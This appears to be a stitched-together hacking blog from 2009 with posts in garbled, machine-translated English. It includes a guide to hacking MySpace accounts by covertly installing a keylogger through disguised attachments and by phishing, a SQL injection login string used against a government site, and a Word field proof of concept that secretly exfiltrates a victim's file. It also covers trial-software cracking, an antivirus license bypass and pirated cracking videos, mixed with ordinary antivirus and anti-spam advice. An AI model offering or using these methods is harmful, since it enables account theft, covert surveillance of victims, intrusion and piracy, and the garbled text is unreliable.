Minggu, 20 September 2009

Hack MySpace Account


MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post you’ll fine the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams.

The following are the only 2 foolproof methods to hack Myspace.

1. How to Hack Myspace – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation. This can also be used on local computer.

SniperSpy

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer. Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What is the best way to deploy the keylogger onto remote PC?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link

SniperSpy

2. How to Hack Myspace – Other Ways

Phishing

Phishing is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.

Speed Up PC


Are you fed up with your slow PC? Well you can Speed Up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I ’ll split this post into 2 parts.

1. Automatic Ways to Speed Up PC (Using PC Speed Up Softwares)

2. Manual Ways to Speed Up PC

Automatic Ways to Speed Up PC

You can use a PC Optimizer Tool to automatically boost the Speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix upto 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the start up etc. This can speed up your PC and Internet speed by upto 3 times. Here are some of the best PC Optimizer Programs that I recommend.

1. Perfect Optimizer

2. Registry Easy

Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.

Manual Ways to Speed Up Your PC

1. Free Up Disk Space to increase the speed of your PC

  • Remove temporary Internet files.
  • Empty the Recycle Bin.
  • Remove Windows temporary files.
  • Uninstall Programs that you no longer use.

2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.

3. Clean Up your Registry (Highly Recommended)

Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately you cannot do this manually. You have to use a Registry Cleaner to do this. Here is the best registry cleaner on the web.

Registry Easy

A complete review of registry cleaners can be found at Registry Cleaner Reviews

4. Clean Up the browser cache to Speed Up your Internet.

5. Install a good Antispyware software

Spywares can really hurt the performance of your PC. So, install a good anti-spyware to protect your PC from spywares and improve the speed of your PC. I recommend the following Antispywares to protect your PC.

1. Spyware Cease

2. Nodware Anti-Spyware

Which is the Best Way to Speed Up my PC? (Auto or Manual)

The best way to speed Up your PC is by using a PC Optimizer such as Perfect Optimizer or Registry Easy. This is because, manual ways can only perform 30-40% of the tweaks to improve the speed of your PC, but the most important aspect of the Speed Up process such as Registry clean Up and other advanced performance tweaks can only be done using a PC Optimizer software. So if you are serious about improving the speed of your PC, then you need to use a PC Optimizer.

Kamis, 17 September 2009

Howto hack someones computer with cain and able


Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.


Cain & Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.

Status with virus scanners

Some virus scanners, notably Avast! detect Cain and Abel as 'malware' "Win32:Cain-B [Tool]". It's classified in Avast! as "Other potentially dangerous program". The author, and owner of oxid.it states that his programs are not Malware. Even if Cain's install directory, as well as the word "Cain", are added to Avast's exclude list, the real-time scanner will stop Cain from functioning. The latest version of Avast no longer blocks

How to hack someones computer using cain and able



The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs
and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.
I have put a link for cain and able free download
cain and abel free download

Features:
1.WEP cracking
2.Speeding up packet capture speed by wireless packet injection
3.Ability to record VoIP conversations
4.Decoding scrambled passwords
5.Calculating hashes
6.Traceroute
7.Revealing password boxes
8.Uncovering cached passwords
9.Dumping protected storage passwords
10.ARP spoofing
11.IP to MAC Address resolver
12.Network Password Sniffer
13.LSA secret dumper

Warning:This tutorial How to hack someones computer with cain and able is truly for educational purposes

How to Fix Infected your computer

IS your PC infected by virus,spyware etc?,Does your pc much takes time to start?,Are you looking for tools to fix up your infected computer then this post is just for you,
I get this question getting asked frequently,"How to fix your infected computer",I have posted here many ways to fix your infected computer and Make it start faster

How to fix you infected computer



Here are some steps you need to take when fixing your infected computer:


Antivirus software

1.Kaspersky:

It is one of the best antivirus availible on web,Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers malicious tools and Auto-Dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network" service.

2.Avira

Avira uses very less CPU and is quite compact.Avira free is much better than Avira Premium even though it offers web filter and mail filter

3.AVG
AVG is one of the most used antiviruses now a days,most of all its free and antispyware too,It is very light and does not acquire too much disk space

4.
Norton
Quite slow if you have a 512 MB or 1GB RAM.2GB and 3 GB RAM Users are only advised to use this software.But it is extremely good in virus detection and does not leave a single trace of any damage,It detects 90% of viruses but not better than kaspersky.

Antispyware:



Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Antispware is the second step in to fix your infected computer.Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer

Here is a list of some antispywares which i would recommend:

1.Ad-Aware Free Anniversary Edition 8.0.7:
It eliminates spy archives and him easily aid to eliminate them of fast form. It can choose the modules to eliminate, to keep files from registry, and to personalize the menu of the program

2.a-squared Free 4.5.0.8:
Also known like a², one specializes in detecting, to eliminate malwares (all type of harmful file). To the day of today, a-squared detects and eliminates more of: 24.000 trojans, 67.000 worms, 40.000 dialers, 11.000 spyware y 70.000 plans or signs.

3
.Malwarebytes Anti-Malware:

This antispy analyzes the discs in search of malware With option to eliminating them. This antispy can be programmed to analyze PC at a certain hour. It has a list for files in quarantine and to ignoring. There exists the possibility of activating the protection in real time (Itdetects the threats before that enter to the system), which, it is of payment.

Others are such as spyware blaster,spy defence etc

Registry scanner:


Next you need a registry scanner, to fix your infected computer,Viruses often copy their algorithm into the registry entry.So you are only 50% done after you delete the virus)
Well there are many registry cleaners availible such as

1.Eusing Free Registry Cleaner/scanner
2.Registry fix
3.Auslogics registry cleaner(My recommendation)

Trojan horse removal:



For this you can read my post on "Trojan horse removal"

Ccleaner:


After that you can download CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files.

Bonus:

Anti-Malware Toolkit - a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.

Help keep your computer safe, secure and clean from malware - get the Anti-Malware Toolkit today!

Download anti malware tool kit here

Use antivirus kapersky without a key


Kaspersky is one of the world,s best antiviruses,but unfortunately its full version is not availible,there are many keys availible online but believe me these are only to waste your time,Your all efforts will end in smoke. I am posting here a method to use kaspersky antivirus without a key (Temp. sol. if ur key is not Valid)
Just follow the steps:

you need to back up first in case any thing goes wrong

1.( Run ) type ( regedit ) press ( OK ).

1- Go To ( HKEY_LOCAL_MACHINESOFTWAREKasperskyLabAVP6Data ) & right click on ( Data ) & choose ( Permissions ).

2- choose ( Advanced ) From The ( Permissions For Data ) ... a new window will open.

3- On ( Advanced Security Settings for Data ) window .. look for ( Inherit from parent ... ) click on the nike or check mark to remove or uncheck it.

4- After removing the check or nike mark u will get a new message .. choose ( Remove ).

5- On ( Advanced security Settings for Data ) click on ( Apply ).

6- choose ( Yes ) for the new message that u will get.

7- Press ( OK ) on ( Advanced security Settings for Data ).

8- Press ( OK ) on ( Permissions For Data ).

9- Exit KasperSky & restart it again.

The Kaspersky icon will be GRAY but it is working perfect.
- You will have to update the database manually ... no automatic update.
- Ignore Windows security center that the antivirus is not working ... in fact it is active.
-

How to run a Trial Software Forever

Today i will show you two ways to hack software and run a trial software forever.
Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there are ways to run the softwares and make them function beyond the trial period.


When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not. RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application. RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

How to run trial software forever - Method

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate

Problems with this hack

Although this hack works on most of the softwares but still there are some software on which this hack wont work

1.This will not work for antivirus since the antivirus needs to be run in the background all the time.RunAsDate cannot be used with any antivirus.


2.This will not work for softwares that require autorun on startup. But works on most of the softwares…


3.you cannot run a software that has a limited number of execution with this hack.


4.You cannot run a keylogger with this hack

Alternate method:Run a trial software forever

As i told you above the above hack wont work on antivirus,autorun startup,keyloggers etc
I have an altenate method for these softwares
" CrackLock" is a program that allows us to indefinitely extend the probationary period of Shareware programs that have a time limit. It works by making the program believe that the date remains constant. Simple and effective.

CrackLook 3.8.1
Download Here

How to Protect an email account from the SPAM


most of us get SPAM every day. Some of us get more and some less. Even a newly created email accounts will start receiving spam just a few days after it was created. Many times we wonder where the spam is coming from and why? But this question remains unanswered in ourselves. So, in this post I will do my best to provide any information about spam and also will tell you about how to combat spam.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most of the broadcast media, digital delivery system) to send the message unsolicited bulk indiscriminately. The most widely recognized form of spam is email spam.

Where SPAM is coming from?

Spam is only coming from spammers and never from a legitimate user or company. These spammers send an email to hundreds (a few thousands or millions) of email addresses at one time. They also send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main objective of spammers is to send spam (bulk messages that are not required) to as many people as possible to make a profit. For example, John built a small site to sell an ebook that gives information about weight loss. In order to make the sale he needs publicity for the website. Instead of spending money on advertising, John decided to create an email containing information about the site along with a link and send this email to such email address 100 in the contact list. If 1 person out of a hundred buy this book john get $ 10. What if he would send an email to the email address 1000s. He got $ 100. Imagine, if he sent this email to the email address 1 million he earned $ 100,000.

Now I hope you understand the idea behind spamming. So in order to make money, email spammers advertising them as much as possible without any respect the privacy of the recipient.

Where do spammers get my email address?

On the Internet there are many sites that collect email ID people and sell them to spammers in bulk. Most often, the people who sign up for monthly newsletter and take surveys. This is the time in which the fraud sites are getting their email address. Also, many spammers collect email addresses using spambots. Spambots collect email addresses from the Internet in order to build mailing lists. As spambots are web crawlers that can gather email addresses from web sites, newsgroups, forums, special interest group (SIG) postings, and chat room conversations.

Spammers use this trick to create Hoax Emails to gather a large list of email ID. For example, a spammer sends an email scam that says "Forward this message to Help is Burned Children". This email claims that 11 cents will be donated to children's family every time a message is sent to someone else. Most people believe this and the scam was started forwarding the email to all the ID in their contact list. In this way the email that spread quickly and eventually when it reaches the creator (spammers), the spammers have a large list of valid email addresses in the email header. When you get this kind of hoax emails, you can see yourself in the email header contains a large list of email addresses of all persons to whom the email was forwarded to. This is one of effective methods used by spammers to collect email addresses.

Is Spamming laws?

Really spamming illegal. But very difficult to stop spamming the spammers because they are constantly moving from another hosting company after getting banned. This makes it nearly impossible to catch spammers and bring them to justice.

How to protect my email account to get SPAMmed?

The following methods can be used to combat spam emails.

1. Use a spam filter for your email account. If you use email services like Gmail, Yahoo, Hotmail, etc., then the spam filter used by defaut. Each spam filter's algorithm to detect spam and will automatically move it to the SPAM folder. This makes your inbox free from spam. However, some spam emails to be successful to make their way into the inbox with successfully through the filter.

2. Do not post your email address in public forums, user comments and chat-rooms. Provide your email address only to Web sites that can be trusted when you sign up for the newsletter.

3. While taking online surveys and fill out feedback forms, it is better to not give your personal email address. In contrast to singup dummy email account and use this to surveys and other forms of feedback.

4. While post your contact email address on your website using this format: emailaddress [at] emailaddress@yoursite.com yoursite.com instead. This will protect your email address from the indexed by spambots.

5. Not responding to hoax messages. When you receive an email scam, avoid forward to your friends. Example of hoax messages can be found in www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use the "Bcc" (blind copy) option to send an email. This will hide all the email ID letter forwarded to.

malaysia country's birthday, hackers from


coincided with the anniversary of Malaysia's independence to 52, the Indonesian Defacer Hackers unite and attack the origin sites and Defacer Malaysia.Hacker the claim has to deface approximately 100 sites from Malaysia. According to them, this action is to provide a warning to Malaysia to no longer disturb the Indonesian culture. "We enliven Malaysia's birthday with our own ways, namely by doing mass deface the sites of the country," wrote a hacker on one site Successful in-deface.Hacker-confessed hacker from IndonesianCoder Team and ServerIsDown.Beberapa successful site is the official site deface Teachers Association of Sarawak (stu.org.my), bagsmalaysia.com, globalmarine.com.my , and dozens of sites mgpskuantan.edu.my watchlist lainnya.Dari Legal, mostly from Malaysia's site is still in position dideface. But there are some sites that have been successfully repaired and can be accessed properly. (srn) Source: Site-Situ okezone.comDaftar Malaysia In The Past Hack: http://pay.hileytech.com/shop1/http://realestate.net.my/pages/http://k2.upm.edu .my / http: / / www.ktdi.upm.edu.my/components/http://www.i-sukan.upm.edu.my/flash/http://www.pkk.upm.edu.my / components / http: / / www.ilamalaysia.org/media/http://www.herbamalaysia.net/http://www.herbamalaysia.net/images/hacked.htmhttp://www.my-jnz.com / index.htmhttp: / / www.kasihsayangku.com/kedaiku/imageshttp://bacalah.info/phproxy/leqhi.htmhttp://www.patriotisme.net.my/http://adventuresports.com.my/http : / / ansaraseremban.org.my / albums / mly.htmhttp: / / www.perdana.net.my/albums/mly.htmhttp://ciscotechnology.com.my/leqhi.htmhttp://www.gemilangterbilang.com .my / http: / / www.alumnibestari.org.my/http://www.perindu.com/ejat/wp-contenthttp://www.myconsult.com.my/public_html/forumhttp://www.ppi .uum.edu.my / forumhttp: / / edc.uum.edu.my / index.htmlhttp: / / www.libertycup / .Dan Plenty More ...============= ===================================== = result Claim Cultural Issues By Malaysia ... We turned out Hacker Indonesia also has a sense of nationalism ... they finally do something like the above ... it works either right or wrong ... this is proof that Indonesia has a lot of people wrote very clever ...

Hacking Email Password



Most people who ask me to teach the easiest way to hack email passwords. Even the most asked questions on hacking is some or other way related to hacking email password. Even if you have a similar question in your mind this is the answer. First of all do not be fooled by what he called "the easiest way to hack email password" given to many scam sites. Here's the scam procedure. This method of hacking password never worked.
- --

>> STEP 1 - Log in to your account (yahoo, hotmail, gmail, etc.)

>> STEP 2 - Click on the Compose

>> Step 3 - In the subject type exactly as follows

Password Retrieval

>> STEP 4 - The exact address to type the following email address

retrieve_mypass@yahoo.com (for yahoo)
send_mypass@hotmail.com (for hotmail)
googlepass_reset@gmail.com (for gmail)

>> STEP 4 - Agency mail

In the first line type in your own email address and the password on the next line.

NOTE: This step is the most important, so do exactly as instructed.

Heres an example

myemailid@yahoo.com
iamafool

Give exactly 4 lines gap after this.
Now type the email addresses of people you want to hack.
On the next line type the following code exactly as given below

Yyb67hhfy ** yssyhhdiuhhyahoo.comsi * @ # 8?? "(for yahoo)

Yyb67hhfy ** yssyhhdiuhhhotmail.comsi * @ # 8?? "(for hotmail)

Yyb67hhfy ** yssyhhdiuhhgoogle.comsi * @ # 8?? "(for gmail)

>> STEP 5 - Now Send the mail and check your inbox after a few hours. The victims password sent to you by resetting the password is server.This major bug in most hosts like yahoo, gmail, etc. Here the server and send the password confused victim.
ENDS PART ----<>----

've Never tried this trick. If you try you'll loose your own password. Let's see how the letters on the work.

First of all "To overcome" the mail is nothing but the ID of the person who wrote this trick. This email has no special value, it was none other than the usual email address as your user's, not the server email address. So you only your own mail ID and password to a stranger in an effort to hack other passwords. All other rules such as line gaps, etc. code nonsense, just given to make you believe it's true. So the point is never trust / try these hacks. This method is called Social Engineering in which people made for their own mail username and password to the hacker ID. So here the people get deceived and lose their passwords in an attempt to hack other passwords.

Actually hacking passwords how to involve the use of a keylogger program. The keylogger is a program that uses stealth to hide it but the existence of secret recordings covering all keystrokes even passwords. Another way involves the use of password hacking trojan, fake login page Make this trick, etc. are discussed in detail in the post Hacking An Email Account. This is a post that includes the full details email hacking.

Selasa, 15 September 2009

PHP SECURITY-CHECK THE BUG PHP SCRIPT


Once completed php script we have made there are times when bugs unwanted fester on the sidelines of the script is ready dionlinekan. And of course this bug can be fatal so it can be used by the intruders in an automated intruders in an automated, which seeks to exploit the system.

And who would have thought that php script that has been made safe from vulnerabilities in security issues. : D ~ ~ ~

Then, how to prevent the hackers exploit, and even damage your website, how to prevent and find out exactly what has created the script has a fatal bug, how to handle it all?? : D

Before we move forward to the next step is a good idea to identify the most popular bugs often diexploitasi.

The author will try to give some explanations, bug often found in web-based applications in particular Content Management System and others. Among them:

- XSS (Cross Site Scripting)
- SQL Injection
- RFI (Remote File Inclusion)

Cross Site Scriping
Better known as XSS. This error occurred because there was no filtering of html and java script.

But basically Defacing (content changes) occur only client side only. The most fatal of this bug is that you can steal cookies and then use it to do something that ... : D ~ ~

Examples:
Sensored [sorry]

SQL Injection
SQL Injection is happening because an attacker who tried to inject sql query via the form or via the address bar in Internet browser. For example when the author tried to login as admin in the South Sumatra government site (http://www.sumsel.go.id). By using the query 'or 1 = 1 - the author was successful login. In essence 'or a single quote and or 1 = 1 - it serves to confuse the sql server, so that by sql server is running the query "select *". What happens is that the author passed to login as admin.

Here is a picture of the author when the author managed to capture login as admin to the site http://www.sumsel.go.id

This picture was taken before the author contacted via email to the webmaster mempatch script phpnya.

RFI (Remote File Inclusion)
Previously, please read the article functions require, require_once, include, and RFI own include_one error occurred because a programmer when doing coding, ie using the variables in these functions. When users enter the URL of his evil script in the variables used in require or include function, it is the evil script can be executed remotely, in other words, the attacker can run commands on your server for the change of site content or even damage it. : D ~ ~

For example please look in the www.milw0rm.com: D ~

Remote File Inclusion Keywordnya. : D ~

Checking BUG
Checking the bug itself can be done manually. Hmmm ... This course will take a lot of time. Tools that can be formed quickly and automatically find bugs stuck in php script by accident or deliberately. : D ~

Basically to check the bug can be done online or offline. Authors suggest that this bug checking done on your localhost (offline) only.

Check XSS Bug
Tools to check the php script XSS on your property is a mozilla firefox addons available for free. Penginstallannya was classified as easy, here is how to use it.

These tools can be downloaded here:
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Check SQL Injection Bug
For the current period with SQL Injection Defacing ranked the most favorite and certainly the most widely used, perhaps because the attacks are carried out fairly easy, just have a basic knowledge of sql syntax. Once again a mozilla firefox addons are quite powerful and easy to use have been provided to conduct a check sql injection bugs. : D

You can download it here:
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Its use was not too difficult.

Check BUG Remote File Inclusion
Previously you first download here scriptnya http://www.newhack.org/dl_jump.php?id
After that, please download active perl, the interpreter is compiler will be used to run scripts inclusionscanner.pl.
And then it inclusionscanner.pl copykan to the directory c: \ perl \ bin

The next step:

1. Enter your script that will scan into a directory in c: \ perl php.

ex: c: \ perl \ wordpress.

2. Log into the command prompt, Start | Run | cmd | enter

3. After that go into the directory c: \ perl \ bin, cd c: \ perl \ bin

4. Run scriptnya,

C: \ Perl \ bin> perl.exe inclusionscanner.pl

# Will check a directory for all includes and unsets

# Coded by Ironfist (ironsecurity.nl)

# Usage: Create a folder in your perlfolder and put the files to be scanned in it

, Next type the folder name below (eg myfolder)

# Gives Errors Checking WHEN subfolders: Ignore THEM Smile

Directory to read? c: \ perl \ wp

then see the results in c: \ perl \ bin \ result.html

The following scan results when the author tries to do the check-inclusion on wordpress 2.3.3:

FOUND: require_once ($ locale_file);
in c: \ perl \ wp / wp-settings.php FOUND: require_once ($ import_root. '/'. $ file);
in c: \ perl \ wp / wp-admin / import.php FOUND: include_once ($ this-> PluginDir. "class-smtp.php");
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ lang_path. "phpmailer.lang-'. $ lang_type.'. php ');
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ lang_path. "phpmailer.lang-en.php ');
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: require_once ($ _template_file);
in c: \ perl \ wp / wp-includes / theme.php

woww! : D ~ ~ please exploitable in the patch script uh yours. : D ~ ~

Remember, no damage, do not do vandals, if you find bugs in other sites as I have mentioned above, please let the

CD Video Hacking and Cracking Software Free


There are times when someone who has enthusiasm in learning about network security experience fatigue in reading what he learned, because basically reading requires a fixed focus of attention, with furrowed brow, perhaps. : D. This time I will try to bring to your natural relaxation, the deeper, more rilex. : D. Yes, of course, the explanation of a hacking or cracking techniques using video is much easier to understand than to read it, and also of course there are many weaknesses. A person who saw the video of course, hacking techniques used to understand the concept of hacking techniques that previously. Besides showing hacking techniques, for those of you who want to learn how a software mengcrack to get cd key, license, or the serial number is presented as a complete video learning. Please download it for free: http://rapidshare.com/files/174700524/Cr4k.h4ck.Tut.part1.rar http://rapidshare.com/files/174700648/Cr4k.h4ck.Tut.part2.rar http://rapidshare.com/files/174700526/Cr4k.h4ck.Tut.part3.rar http://rapidshare.com/files/174700610/Cr4k.h4ck.Tut.part4.rar http://rapidshare.com/files/174700440/Cr4k.h4ck.Tut.part5.rar http://rapidshare.com/files/174700301/Cr4k.h4ck.Tut.part6.rar

Senin, 14 September 2009

Hack microsoft office

This article is just to make u aware of knowm existing threats
only for educational purpose.


I have stumbled onto a couple potential security issue in Microsoft
Word blogs i would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. I am fairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.


Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.


1) Document collaboration spyware.



Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker the file will also include
contents of another file(s) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field
into the document. The field results in inclusion of a specified file
into the current document. Of course, Hacker must be careful include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and in my opinion cleaner, she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.


Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).


Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask google how to do it by hand).


{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }



Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.


2) Oblivious signing



Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the sign contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker
and she gets away without paying Victim $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.


Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.


{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }


Update : this flaw has been fixed in office 2003 onwards
but still works in office 2000 and even sometimes in 2002/03


__________________________________________________________________________

We can
consistently crash Word 2000 using the following method:


1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar

This consistenly crashes Word 2000 with the following error
message:

DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".





Vulnerability:

remove office passwords
Vulnerable:

MS Word (Win2K/XP)



Example 1

1) Open MS Word with a new/blank page

2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc

3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...



Example 2

1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)

2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)

3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)

4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password





